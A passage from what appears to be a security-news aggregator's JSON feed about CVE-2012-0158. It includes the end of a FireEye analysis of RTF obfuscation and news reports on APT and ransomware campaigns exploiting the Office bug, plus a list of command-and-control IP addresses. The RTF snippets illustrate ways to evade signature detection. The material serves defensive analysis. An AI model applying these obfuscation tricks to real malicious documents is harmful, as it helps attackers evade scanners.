444444446666} \n \nRTF parser can also recognize \\datastore and understand that it can accept data, therefore the following data will be consumed by \\datastore.\n\n3.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\unknown314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nFor an analyst, it\u2019s difficult to manually extract embedded objects from an obfuscated RTF, and no public tool can handle obfuscated RTF. However, winword.exe uses the OleConvertOLESTREAMToIStorage function to convert OLE1 native data to OLE2 structured storage object. Here\u2019s the prototype of OleConvertOLESTREAMToIStorage:\n\n\n\nThe object pointed by lpolestream contains a pointer to OLE1 native binary data. We can set a breakpoint at OleConvertOLESTREAMToIStorage and dump out the object data which has been de-obfuscated by the RTF Parser:\n\n\n\nThe last command .writemem writes a section of memory to d:\\evil_objdata.bin. You can specify other paths as you want; 0e170020 is the start address of the memory range, and 831b6 is the size.\n\nMost of the obfuscation techniques of \\objdata can also apply to embedded images, but for images, it seems there is no obvious technique as OleConvertOLESTREAMToIStorage. To extract an obfuscated picture, locate the RTF parsing code quickly using data breakpoint and that will reveal the best point to dump the whole data.\n\n#### **Conclusion**\n\nOur adversaries are sophisticated and familiar with the RTF format and the inner workings of Microsoft Word. They have managed to devise these obfuscation tricks to evade traditional signature-based detection. Understanding how our adversary is performing obfuscation can in turn help us improve our detection of such malware.\n\n#### **Acknowledgements**\n\nThanks to Yinhong Chang, Jonell Baltazar and Daniel Regalado for their contributions to this blog.\n", "modified": "2016-05-20T14:59:00", "published": "2016-05-20T14:59:00", "href": "https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html", "id": "FIREEYE:E267B700204EA085E6CF4FEBA0C989D3", "title": "How RTF malware evades static signature-based detection", "type": "fireeye", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T10:06:42", "bulletinFamily": "info", "description": "[](<https://2.bp.blogspot.com/-UbDg_2GB7PM/UvnrUMicegI/AAAAAAAAaEM/KiTNTDtBQro/s1600/Valentine-day-malware-hacking.jpg>)\n\n_Valentine's Day__ _\\- a day of hearts, Chocolates, Flowers and Celebrations when people express their emotions to their loved ones and most of us send E-cards, purchase special gifts with the help of various Online Shop Sites and many other tantrums making them feel special.\n\n \n\n\nWhile you are busy in Googling ideal gifts for your loved ones, the Cyber thieves are also busy in taking advantage of such events by spreading various [malware](<https://thehackernews.com/search/label/Malware>), phishing campaigns and fraud schemes as these days come out to be a goldmine for the cyber criminals.\n\n \n\n\n_Online Shopping Scams_ are popular among Cyber criminals as it is the easiest way for hackers to steal money in easy and untraceable ways.\n\n \n\n\nSecurity Researchers at Anti virus firm - _Trend Micro_ [discovered](<http://blog.trendmicro.com/trendlabs-security-intelligence/breaking-up-with-valentines-day-online-threats/>) various Valentine's Day threats which are common at such occasion i.e. A flower-delivery service and it appears to be a normal promotional e-mail, but the links actually lead to various survey scams.\n\n \n\n\nThe Malware threats also arrive during this season of love. The researchers recently found a new attack targeting Canadian users looking for a Romantic Dinner Giveaway. The email appears to be about a special Valentine Dinner, and has an attachment which is actually a malicious _.RTF_ file (_detected as TROJ_ARTIEF. VDY_), using a known buffer overflow vulnerability (_[CVE-2012-0158](<https://technet.microsoft.com/en-us/security/bulletin/ms12-027>)_) in Windows Common Controls, allows remote code execution to drop a backdoor (BKDR_INJECT.VDY) onto the affected system.\n\n[](<https://2.bp.blogspot.com/-9TVw2Nf0xD0/UvnqlXFjJGI/AAAAAAAAaEE/uNtMfYZkQ6w/s1600/Valentine-day-malware-hacking.png>)\n\nThis Valentine's Day, with the popularity of Android phones and iPhones, it seems practical to impress your beloved by sending e-cards using various Valentine's Day Apps, but you never realize that despite sending E-cards, you are also inflicting an [Android](<https://thehackernews.com/search/label/Android>) malware on your beloveds which could be worse to your relation.\n\n \n\n\nThe security researchers from _Bitdefender_ recently released a report, noted how such Valentine's Day apps could demand undue permissions, that could violate users\u2019 privacy, rack up users\u2019 phone bills, and even possibly cause identity theft.\n\n \n\n\nThe researchers have detected various malware-inflicted apps, one of which is \u2018**Valentine\u2019s Day 2014 Wallpaper**.\u2019 The app records user\u2019s location and his browsing history in the process without having any justification for asking permissions.\n\n \n\n\nAnother is \u2018**Valentine's Day Frames**\u2019, the app that reads the user\u2019s contacts list, which is logically an odd request because the app is only intended to adorn user\u2019s romantic photographs with Valentine's Day themed photo frames. _So what\u2019s the use of reading your contact list for this app?_\n\n \n\n\nOne more, \u2018**Love Letters for Chat, Status**\u2019 which allows you to share love quotes, letters, and even poems to your dearest friends, but the app is capable to send emails, make phone calls, change audio settings, and even modify calendar events without your permission. So gifting this to your beloved may cause an end to you sweet relation.\n\n \n\n\nSeasonal deals and offers are common place, so its users own duty to spot what\u2019s malicious and what\u2019s not. Following are some tips every Internet user must follow:\n\n * Do not to open emails and click links in wild from unknown sources.\n * Do not run attached files that come from unknown sources, especially these days.\n * The biggest bargains aren\u2019t always the biggest stealing. If an offer sounds too good to be true, it probably is, but if you are making purchases online, then prefer a reputed shopping site and type the address of the store in the browser, rather than going through any links that have been sent to you.\n * Has an effective security solution installed in your system that is capable of detecting both known and new malware strains.\n\nDon\u2019t spread malware... Spread love :) Stay safe! Stay tuned to The Hacker News.\n", "modified": "2014-02-11T09:26:36", "published": "2014-02-10T22:26:00", "id": "THN:28D18D871A6086136DFA7958D9C516E0", "href": "https://thehackernews.com/2014/02/beware-cyber-criminals-may-spoil-your.html", "type": "thn", "title": "Beware! Cyber Criminals may spoil your Valentine's Day", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:13", "bulletinFamily": "info", "description": "None\n", "modified": "2013-10-27T16:41:46", "published": "2013-10-27T05:37:00", "id": "THN:DC21EBE0272DEA3B043A3EB0A5B5B1DA", "href": "http://thehackernews.com/2013/10/terminator-rat-became-more.html", "type": "thn", "title": "Terminator RAT became more sophisticated in recent APT attacks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:20", "bulletinFamily": "info", "description": "[](<http://2.bp.blogspot.com/-M8cMLC5NtdI/Ua4XqeyaL9I/AAAAAAAAV9g/soz4j7rFh4E/s1600/Surveillance+malware+targets+350+high+profile+victims+in+40+countries.png>)\n\nA global cyber espionage campaign affecting over 350 high profile victims in 40 countries, appears to be the work of [Chinese hackers](<http://thehackernews.com/2013/02/chinese-government-targets-uyghur-group.html>) using a Surveillance malware called \"**_NetTraveler_**\".\n\n \n\n\nKaspersky Lab\u2019s team of experts published a new research [report](<http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf>) about NetTraveler, which is a family of malicious programs used by APT cyber crooks. The main targets of the campaign, which has been running since 2004, are Tibetan/Uyghur activists, government institutions, contractors and embassies, as well as the oil and gas industry.\n\n[Spear phishing](<http://thehackernews.com/2011/01/spear-phishing-latest-ploy-to-steal.html>) emails were used to trick targets into opening [malicious documents](<http://thehackernews.com/2012/01/print-of-one-malicious-document-can.html>). The attackers are using two vulnerabilities in Microsoft Office including Exploit.MSWord.CVE-2010-333, Exploit.Win32.CVE-2012-0158, which have been patched but remain highly-popular on the hacking scene, and have run NetTraveler alongside other malware. \n \nC&C servers are used to install additional malware on infected machines and exfiltrate stolen data and more than 22 gigabytes amount of stolen data stored on NetTraveler\u2019s C&C servers.\n\n \n\n\nAccording to researchers, the largest number of samples we observed were created between 2010 and 2013. The largest number of infections has been spotted in Mongolia, India and Russia, also in China, South Korea, Germany, the US, Canada, the UK, Austria, Japan, Iran, Pakistan, Spain and Australia.\n\n \n\n\nResearchers believe that hackers team behind this attack are 50 individuals, most of whom speak Chinese natively but also have a decent level of English.\n\n \n\n\nSix victims were also hit by the [Red October](<http://thehackernews.com/2013/01/operation-red-october-cyber-espionage.html>) attackers, whom Kaspersky had profiled last year. Those victims included a military contractor in Russia and an embassy in Iran.\n", "modified": "2013-06-04T16:39:05", "published": "2013-06-04T05:39:00", "id": "THN:D9114576EA7861D9D8859B9EF23814E4", "href": "http://thehackernews.com/2013/06/surveillance-malware-targets-350-high.html", "type": "thn", "title": "Surveillance malware targets 350 high profile victims in 40 countries", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:09", "bulletinFamily": "info", "description": "[](<https://3.bp.blogspot.com/-8CkpwB8JPN8/U999kcWKl_I/AAAAAAAAcqQ/EdVV47WNr10/s1600/Poweliks-persistent-malware-windows-registry.jpg>)\n\nMalware is nothing but a malicious files which is stored on an infected computer system in order to damage the system or steal sensitive data from it or perform other malicious activities. But security researchers have uncovered a new and sophisticated piece of malware that infects systems and steals data without installing any file onto the targeted system.\n\n \n\n\nResearchers dubbed this [persistent malware](<https://thehackernews.com/search/label/Advanced%20Persistent%20Threat>) as **Poweliks**, which resides in the computer registry only and is therefore not easily detectable as other typical malware that installs files on the affected system which can be scanned by antivirus or anti-malware Software.\n\n \n\n\nAccording to [Paul Rascagneres](<https://twitter.com/r00tbsd>), Senior Threat Researcher, Malware analyst at GData software, due to the malware\u2019s subsequent and step-after-step execution of code, the feature set was similar to a stacking principles of Matryoshka Doll approach.\n\n \n\n\nPaul has made a number of name ripping malware and bots to uncover and undermine cyber crimes. He won last years' Pwnie Award at _Black Hat Las Vegas_ for tearing through the infrastructure of Chinese hacker group APT1.\n\n \n\n\nIn order to infect a system, the [malware](<https://thehackernews.com/search/label/Malware>) spreads via emails through a malicious Microsoft Word document and after that it creates an encoded autostart registry key and to remain undetectable it keeps the registry key hidden, Rascagneres says.\n\n \n\n\nThe malware then creates and executes shellcode, along with a payload Windows binary that tried to connect to \u2018_hard coded IP addresses_\u2019 in an effort to receive further commands from the attacker.\n\n> \"_All activities are stored in the registry. No file is ever created,\"_ Rascagneres said in a [blog post](<https://blog.gdatasoftware.com/blog/article/poweliks-the-persistent-malware-without-a-file.html>). _\"So, attackers are able to circumvent classic anti-malware file scan techniques with such an approach and are able to carry out any desired action when they reach the innermost layer of [a machine] even after a system re-boot._\u201d\n\n> _\"To prevent attacks like this, antivirus solutions have to either catch the initial Word document before it is executed (if there is one), preferably before it reached the customer's email inbox.\"_\n\nTo create an autostart mechanism, the malware creates a registry, which is a non-ASCII character key, as Windows Regedit cannot read or open the non-ASCII key entry.\n\n \n\n\n**CAPABILITIES OF POWELIKS MALWARE**\n\nPoweliks malware is quite dangerous and can perform a number of malicious activities. The malware can: \n\n * Download any payload\n * Install spyware on the infected computer to harvest users\u2019 personal information or business documents\n * Install banking Trojans in order to steal money\n * Install any other type of malicious software that can fulfil the needs of the attackers\n * used in botnet structures\n * generate immense revenue through ad-fraud\n\n_The non-ASCII trick is a tool which the Microsoft created and uses in order to hide its source code from being copied or tampered with, but this feature was later cracked by a security researcher. _\n\n[](<https://1.bp.blogspot.com/-wwHjFi73t9w/U998OfeEGVI/AAAAAAAAcqI/-WWnTsYObIA/s1600/poweliks_regedit_.png>)\n\nThe security and malware researchers on the _KernelMode.info_ forum last month analysed a sample which is dropped by a Microsoft Word document that exploited the vulnerability described in CVE-2012-0158, which affected Microsoft products including Microsoft Office. \n\n \n\n\nThe malware authors distributed the malware as an attachment of fake Canada Post and/or USPS email allegedly holding tracking information.\n\n> \"_This trick prevents a lot of tools from processing this malicious entry at all and it could generate a lot of trouble for incident response teams during the analysis. The mechanism can be used to start any program on the infected system and this makes it very powerful,_\" Rascagneres said.\n", "modified": "2014-08-04T12:49:05", "published": "2014-08-04T01:37:00", "id": "THN:82833AE00002BB0F41BEF5FD8972FAFB", "href": "https://thehackernews.com/2014/08/poweliks-persistent-windows-malware.html", "type": "thn", "title": "POWELIKS \u2014 A Persistent Windows Malware Without Any Installer File", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-15T11:50:59", "bulletinFamily": "info", "description": "[](<https://thehackernews.com/images/-NZsRCoMmOn8/XpWH1q07tzI/AAAAAAAAAN8/WwbAeoGUIyUyD1p1LTfUXvZao-TclGL-QCLcBGAsYHQ/s728-e100/ransomware-healthcare.jpg>)\n\nAs hospitals around the world are struggling to respond to the coronavirus crisis, cybercriminals\u2014with no conscience and empathy\u2014are continuously targeting healthcare organizations, research facilities, and other governmental organizations with ransomware and malicious information stealers. \n \nThe new research, published by Palo Alto Networks and shared with The Hacker News, [confirmed](<https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/>) that \"the threat actors who profit from cybercrime will go to any extent, including targeting organizations that are in the front lines and responding to the pandemic on a daily basis.\" \n \nWhile the security firm didn't name the latest victims, it said a Canadian government healthcare organization and a Canadian medical research university both suffered ransomware attacks, as criminal groups seek to exploit the crisis for financial gain. \n \nThe attacks were detected between March 24 and March 26 and were initiated as part of the coronavirus-themed phishing campaigns that have become widespread in recent months. \n\n\n \nPalo Alto Networks' disclosure comes as The U.S. Department of Health and Human Services ([HHS](<https://www.reuters.com/article/us-healthcare-coronavirus-usa-cyberattac/cyberattack-hits-u-s-health-department-amid-coronavirus-crisis-idUSKBN21320V>)), biotechnology firm [10x Genomics](<https://www.bloomberg.com/news/articles/2020-04-01/hackers-without-conscience-demand-ransom-from-health-providers>), [Brno University Hospital](<https://www.novinky.cz/internet-a-pc/bezpecnost/clanek/fakultni-nemocnice-v-brne-je-cilem-pocitacoveho-utoku-potvrdil-c-40316531>) in the Czech Republic, and [Hammersmith Medicines Research](<https://www.computerweekly.com/news/252480425/Cyber-gangsters-hit-UK-medical-research-lorganisation-poised-for-work-on-Coronavirus>) have been hit by [cyberattacks](<https://twitter.com/AltShiftPrtScn/status/1243166479903834112>) in the past few weeks. \n \n\n\n## Delivering Ransomware by Exploiting CVE-2012-0158\n\n \nAccording to the researchers, the campaign began with malicious emails sent from a spoofed address mimicking the World Health Organization (noreply@who[.]int) that were sent to a number of individuals associated with the healthcare organization that's actively involved in COVID-19 response efforts. \n \nThe email lures contained a rich text format (RTF) document named \"_20200323-sitrep-63-covid-19.doc_,\" which, when opened, attempted to deliver EDA2 ransomware by exploiting a known buffer overflow vulnerability ([CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>)) in Microsoft's ListView / TreeView ActiveX controls in MSCOMCTL.OCX library. \n \n\n\n[](<https://thehackernews.com/images/-tDmarl5Chgc/XpWFNQpROzI/AAAAAAAAANw/Xe1Femp0QBIB0YfJayeZi_qwxyY3ho_bwCLcBGAsYHQ/s728-e100/phishing-malware-email.jpg>)\n\n \n\"It is interesting to note that even though the file name clearly references a specific date (March 23, 2020), the file name was not updated over the course of the campaign to reflect current dates,\" Palo Alto Networks researchers noted. \n \n\"It is also interesting that the malware authors did not attempt to make their lures appear legitimate in any way; it is clear from the first page of the document that something is amiss.\" \n \nUpon execution, the ransomware binary contacts the command-and-control (C2) server to download an image that serves as the main ransomware infection notification on the victim's device, and subsequently transmits the host details to create a custom key to encrypt the files on the system's desktop with a \".locked20\" extension. \n \nAside from receiving the key, the infected host uses an HTTP Post request to send the decryption key, encrypted using AES, to the C2 server. \n \nPalo Alto Networks ascertained that the ransomware strain was EDA2 based on the code structure of the binary and the host-based and network-based behaviors of the ransomware. EDA2 and Hidden Tear are considered one of the [first open-source ransomware](<https://blog.trendmicro.com/trendlabs-security-intelligence/new-open-source-ransomwar-based-on-hidden-tear-and-eda2-may-target-businesses/>) that were created for educational purposes but have since been abused by hackers to pursue their own interests. \n \n\n\n## A Spike in Ransomware Incidents\n\n \nThe ransomware attacks are a consequence of an [increase in other cyberattacks](<https://thehackernews.com/2020/03/covid-19-coronavirus-hacker-malware.html>) related to the pandemic. They have included a rash of [phishing emails](<https://thehackernews.com/2020/04/cronavirus-hackers.html>) that attempt to use the crisis to persuade people to click on links that download malware or ransomware onto their computers. \n\n\n \nFurthermore, Check Point Research's Brand Phishing Report for Q1 2020 observed a jump in mobile phishing due to people spending more time on their phones for information related to the outbreak and for work. Attackers were found imitating popular services such as Netflix, Airbnb, and Chase Bank to steal login credentials. \n \nWith hospitals under time constraints and pressure due to the ongoing pandemic, hackers are counting on the organizations to pay ransoms to recover access to critical systems and prevent disruption to patient care. \n \nA report released by [RisKIQ](<https://www.riskiq.com/wp-content/uploads/2020/04/Ransomware-in-Health-Sector-Intelligence-Brief-RiskIQ.pdf>) last week found that ransomware attacks on medical facilities were up 35% between 2016 and 2019, with the average ransom demand being $59,000 across 127 incidents. The cybersecurity firm stated that hackers also favored small hospitals and healthcare centers for reasons ranging from lean security support to increased likelihood of heeding to ransom demands. \n \nThe spike in ransomware attacks against the medical sector has prompted [Interpol](<https://www.interpol.int/en/News-and-Events/News/2020/Cybercriminals-targeting-critical-healthcare-institutions-with-ransomware>) to issue a warning about the threat to member countries. \n \n\"Cybercriminals are using ransomware to hold hospitals and medical services digitally hostage, preventing them from accessing vital files and systems until a ransom is paid,\" the agency said. \n \nTo protect the systems from such attacks, Interpol cautioned organizations to watch out for phishing attempts, encrypt sensitive data, and take periodic data backups, aside from storing them offline or on a different network to thwart cybercriminals.\n", "modified": "2020-04-15T10:08:57", "published": "2020-04-14T10:00:00", "id": "THN:8007E43933D6EA07FB6E74E9DCC5FA70", "href": "https://thehackernews.com/2020/04/ransomware-hospitals-coronavirus.html", "type": "thn", "title": "Hackers Targeting Critical Healthcare Facilities With Ransomware During Coronavirus Pandemic", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-01-08T18:01:15", "bulletinFamily": "info", "description": "[](<http://3.bp.blogspot.com/-u4tWthaiHas/UkWq-HnhGBI/AAAAAAAAXy0/QcH2jC5FGbA/s1600/Chinese+APT+Espionage+campaign,+dubbed+'Icefog'+targeted+Military+contractors+and+Governments.png>)\n\n**Kaspersky Lab** has identified another [Chinese APT campaign](<http://thehackernews.com/search/label/APT1>), dubbed \u2018**Icefog**\u2019, who targeted Governmental institutions, Military contractors, maritime / shipbuilding groups, telecom operators, industrial and high technology companies and mass media.\n\n \n\n\nThe Hacking group behind the attack who carry out surgical [hit and run operations](<http://thehackernews.com/search/label/cyber%20espionage>), is an [advanced persistent threat](<http://thehackernews.com/search/label/Chinese%20Hackers>) (APT) group, used a backdoor dubbed Icefog that worked across Windows and [Mac OS X](<http://thehackernews.com/search/label/Mac%20OS>) to gain access to systems.\n\n\"_The Mac OS X backdoor currently remains largely undetected by security solutions and has managed to infect several hundred victims worldwide_,\" [the report](<http://www.securelist.com/en/downloads/vlpdfs/icefog.pdf>) (PDF) said. \n \n\n\nThis China-based [campaign](<http://thehackernews.com/2013/02/mandiant-revealed-chinese-apt1-cyber.html>) is almost two years old and follows the pattern of similar APT-style attacks where victims are compromised via a malicious attachment in a [spear-phishing](<http://thehackernews.com/search/label/Spear%20Phishing>) email, or are lured to a compromised website and infected with [malware](<http://thehackernews.com/search/label/Malware>).\n\nThe attackers embed exploits for several known [vulnerabilities](<http://thehackernews.com/search/label/Vulnerability>) (CVE-2012-1856 and CVE-2012-0158) into Microsoft Word and Excel documents.\n\n \n\n\nOnce a computer has been compromised, the hackers upload [malicious tools](<http://thehackernews.com/search/label/hacking%20tool>) and backdoors. They look for email account credentials, sensitive documents and passwords to other systems.\n\n[](<http://2.bp.blogspot.com/-XiMXWdrJEd0/UkWrQ-NuzjI/AAAAAAAAXy8/Otpp4n6YeSY/s1600/Spear+phishing+mail.png>)\n\n \n\n\n\"_We observed many victims in several other countries, including Taiwan, Hong Kong, China, USA, Australia, Canada, UK, Italy, Germany, Austria, Singapore, Belarus and Malaysia_,\" the research team said.\n\n \n\n\nThere is no concrete evidence to confirm this was a nation-state sponsored operation, but based on where the stolen data were transferred to, Kaspersky wrote the attackers are assumed to be in China, South Korea and Japan.\n\n[](<http://4.bp.blogspot.com/-ZFm4K6kLoyI/UkWsMlnzypI/AAAAAAAAXzI/bJ9suAFvclM/s1600/statistics.png>)\n\nIn total, Kaspersky Lab observed more than 4,000 uniquely infected IPs and several hundred victims. They are now in contact with the targeted organizations as well as government entities in order to help them identify and eradicate the infections.\n", "modified": "2013-09-27T16:12:43", "published": "2013-09-27T05:05:00", "id": "THN:59AA6ADFEEB67D7E156CDF3579330697", "href": "http://thehackernews.com/2013/09/chinese-apt-espionage-campaign-dubbed.html", "type": "thn", "title": "Chinese APT Espionage campaign, dubbed 'Icefog' targeted Military contractors and Governments", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:26", "bulletinFamily": "info", "description": "A new sensational discovered has been announced by Kaspersky Lab\u2019s Global Research & Analysis Team result of an investigation after several attacks hit computer networks of various international diplomatic service agencies.\n\n[](<http://3.bp.blogspot.com/-oLHA29NAIM8/UPUy7lMIn9I/AAAAAAAAAI4/5CzgGdxDSeU/s1600/Red+October+Operation.png>)\n\nA new large scale [cyber-espionage](<http://securityaffairs.co/wordpress/11405/intelligence/cyberespionage-another-watering-hole-attack-against-us-website.html>) operation has been discovered, named **Red October**, name inspired by famous novel **The Hunt For The Red October (ROCRA)** and chosen because the investigation started last October.\n\n \n\n\nThe campaign hit hundreds of machines belonging to following categories:\n\n * Government\n * Diplomatic / embassies\n * Research institutions\n * Trade and commerce\n * Nuclear / energy research\n * Oil and gas companies\n * Aerospace\n * Military\n\nThe attackers have targeted various devices such as enterprise network equipment and mobile devices (Windows Mobile, iPhone, Nokia), hijacking files from removable disk drives, stealing e-mail databases from local Outlook storage or remote POP/IMAP server and siphoning files from local network FTP servers.\n\n \n \n\n\nAccording security experts involved in the investigation the cyber-espionage campaign was started since 2007 and is still active, during this long period the attackers obtained a huge quantity of information such as service credentials that hav been reused in later attacks.\n\n \n\n\nThe control structure discovered is very complex and extended, more than 60 domain names and several server hosting located in many countries mainly Germany and Russia. A particularity of the C&C architecture is that the network is arranged to hide the mothership-server true proxy functionality of every node in the malicious structure.\n\n \n\n\nSecurity experts were able to sinkhole six of the 60 domains used during the period 2 Nov 2012 - 10 Jan 2013, registering over 55,000 connections to the sinkhole from 250 different victim\u2019s IPs from 39 different countries, with most of IPs being from Switzerland. Kazakhstan and Greece follow next.\n\n[](<http://3.bp.blogspot.com/-2eJDE126xVU/UPUzWdD6aII/AAAAAAAAAJA/bK4zpvEs7WA/s1600/Red+October+Operation.png>)\n\n**Red October Geo-distribution of victims**\n\nWhich are the vulnerabilities exploited for the attacks?\n\nThe security expert discovered that at least three different known vulnerabilities have been exploited\n\n * CVE-2009-3129 (MS Excel) [attacks dated 2010 and 21011]\n * CVE-2010-3333 (MS Word) [attacks conducted in the summer of 2012]\n * CVE-2012-0158 (MS Word) [attacks conducted in the summer of 2012]\n\nEvidences collected during the investigation let security specialists to believe that attackers have Russian origins, but strangely they appear unrelated to any other cyber attacks detected until now. The exploits appear to have been created by Chinese hackers.\n\n \n\n\n**Attack Method**\n\nThese attacks is structured in two distinct phases according a classic schema of targeted attacks:\n\n 1. Initial infection\n 2. Additional modules deployed for intelligence gathering\n\nIn the initial phase the malware is delivered via e-mail as attachments (Microsoft Excel, Word and, probably PDF documents), once victims opened the malicious document the embedded malicious code initiated the setup of the main component which in turn handled further communication with the C&C servers, after the malware receives from the C&C server a number of additional spy modules. \n \n\n\nThe way to infect entire network is very efficient, the hackers used a module to scan target infrastructure searching for vulnerable machines. The attacks against each machine and related services is made exploiting the above vulnerabilities or gaining access to it using credentials collected during other attacks of the same campaign. The exploits appear to have been created by Chinese hackers. \n \n\n\nWhat alarms me is that such campaigns could be going on for years with disastrous consequences ... _what to do at this point? How is it possible that an operation so extended escape for so long to world wide security community? Who is behind the attacks? Cyber criminals or state-sponsored hackers?_\n\n \n\n\n**UPDATE 2013/01/15**\n\nJeffrey Carr, founder and CEO of Taia Global, Inc, posted on [his blog](<http://jeffreycarr.blogspot.it/2013/01/rbn-connection-to-kasperskys-red.html>)\n\n \n\n\nThe developers behind ROCRA, who are Russian, are comfortable using Chinese malware and adapting it for their own use according to the Kaspersky report. This fits the RBN profile to a \u2018t\u2019. I ran 13 IPs listed in Kaspersky\u2019s report against the [RBN list](<http://doc.emergingthreats.net/pub/Main/RussianBusinessNetwork/RussianBusinessNetworkIPs.txt>) maintained by James McQuade and found matching IP blocks for five of them:\n\n \n\n\n**Malicious servers**\n\n * 178.63.208.49 matches to 178.63.\n * 188.40.19.247 matches to 188.40.\n * 78.46.173.15 matches to 78.46.\n * 88.198.30.44 matches to 88.198.\n\n**Mini-motherships**\n\n * 91.226.31.40 matches to 91.226.\n\nIt has been my belief for many years that the RBN has a working relationship with the Russian government; that it disappeared from view when the FBI sought the assistance of the FSB to shut down their operations in 2007 (as detailed in chapter 8 of my book); and that it has continued operating below the radar all this time. It provides distance and deniability to the FSB for certain offensive cyber operations and, in exchange, the FSB allows the RBN to operate as a criminal enterprise; a portion of which involves selling the data that it steals to whomever is interested.Red October is already the most significant find of the new year. If, in fact, Kaspersky has uncovered an RBN-controlled espionage ring, it\u2019s going to be one of the most important discoveries of the decade.\n", "modified": "2013-10-14T11:49:51", "published": "2013-01-14T23:49:00", "id": "THN:B02C7C78600ED331232ABD4D1F8D2C4A", "href": "http://thehackernews.com/2013/01/operation-red-october-cyber-espionage.html", "type": "thn", "title": "Operation Red October : Cyber Espionage campaign against many Governments", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:57:56", "bulletinFamily": "info", "description": "A Russian APT group tied to ongoing attacks against military and political targets in Eastern Europe and against NATO could also have ties to the [MiniDuke espionage campaign](<http://threatpost.com/miniduke-espionage-malware-hits-governments-europe-using-adobe-exploits-022713/77569>) uncovered more than a year ago.\n\nDubbed [APT28](<http://www.fireeye.com/resources/pdfs/apt28.pdf>) by FireEye in a report published last night, the Russian hackers have targeted Eastern European governments and military organizations, the government of the country of Georgia, as well as NATO and the Organization for Security and Cooperation in Europe (OSCE). The group, FireEye said, operates as a professional team with indicators of long-term software development planning and operational security tactics in place. They operate during business hours, on Moscow time, and use phishing lures specific to government and military officials of political and strategic value to the Russian government, the report said.\n\nKaspersky Lab Global Research & Analysis Team expert Aleks Gostev said this same group is also known as Sofacy and may have ties to the MiniDuke campaign. The [MiniDuke campaign also was used for political and military espionage](<http://threatpost.com/miniduke-apt-campaign-returns-with-new-targets-hacking-tools/107008>) but relied on a number of unusual tactics in a shotgun-style approach with 59 victims in 23 countries, most of those in Europe.\n\nLike MiniDuke, APT28 relies on phishing emails to penetrate organizations. The messages are spiked with convincing decoy documents that kick off a string of infections and backdoors where stolen information is ultimately encrypted and sent to a command and control server.\n\nLaura Galante, manager of threat intelligence at FireEye, said they have not been able to determine how successful APT28 has been with these three particular sets of targets.\n\n\u201cThat\u2019s part of the open question,\u201d Galante said. \u201cWe can see the targets in Eastern Europe by the lures they use and domains they\u2019ve registered, but we don\u2019t have perfect visibility on what they\u2019re doing with the targets they\u2019re able to compromise. If you can get into the email of an Eastern European military attache, what are they doing with the stolen communication? I would wager they\u2019re probably using it to think about their own policy decisions and shape their responses to military and political affairs.\u201d\n\nGalante said the malware and attack tools have been regularly updated and refined since 2007.\n\nGalante said the malware and attack tools have been regularly updated and refined since 2007. The development platforms are flexible and built for long-term use, and the coders are skilled not only at building custom malware, but also coding in barriers that complicate reverse engineering and other forensic analysis.\n\nFireEye said in its report that the malware samples include Russian language settings and were compiled in a Russian language build environment starting in 2007\u2014more than 96 percent of the samples were compiled between Monday and Friday and 89 percent between 8 a.m. and 6 p.m. UTC+4 time zone, FireEye said.\n\nThree primary targets all have political or military value to the Russian government. Attacks on one target, the Georgian government, ramped up following the 2008 war with Georgia and that country\u2019s subsequent growing ties to the West. Specifically, attacks against the Georgian Ministry of Internal Affairs and the Ministry of Defense were carried out. Spear phishing attacks tailored to particular people or organizations at each ministry were found, each with a different exploit for a Microsoft Office vulnerability.\n\n\u201cIn general, the group relies on older exploits, such as CVE-2012-0158, and it does not appear to be as sophisticated in terms of technical skills as other groups, for instance [Turla](<http://threatpost.com/epic-operation-kicks-off-multistage-turla-apt-campaign/107612>),\u201d Kaspersky\u2019s Gostev said.\n\nSeparate attacks were also discovered against the Eastern European Ministry of Foreign Affairs, the Polish government, NATO, OSCE, defense attaches working in Eastern European countries, and even attendees of European defense exhibitions, each following a similar pattern as other APT28 attacks, FireEye said.\n\n\u201cThe malware used in these attacks has some interesting features, but when you\u2019re thinking about how they\u2019re getting on networks, they\u2019re still relying on spear phishing,\u201d Galante said. \u201cThey\u2019re still requiring and dependent on a user mistake to get on a network.\u201d\n\nThe malware, Galante said, is custom built by the group. Once a victim opens a spear phishing email and executes the malware tucked in the tainted Office attachment, a dropper malware loads the Sofacy downloader which grabs second-stage malware from a command and control server, Galante said. A backdoor is established for anything from shellcode execution, credential theft and system monitoring. Implants are then dropped onto the victim\u2019s machine that include counter reverse-engineering features that disrupt static analysis of the malware. Stolen data is protected with RSA encryption as it moves from the victim to the controller, FireEye said.\n\nUnlike Chinese APT groups that have been unmasked, Galante said Russian groups don\u2019t generally steal intellectual property.\n\n\u201cWith the Russian group, the victim set is narrow and the type of operations occurring are distinct from intellectual property and financial data theft that the Chinese groups focus on,\u201d Galante said. \u201cThe majority of Chinese groups go after trade secrets to help their 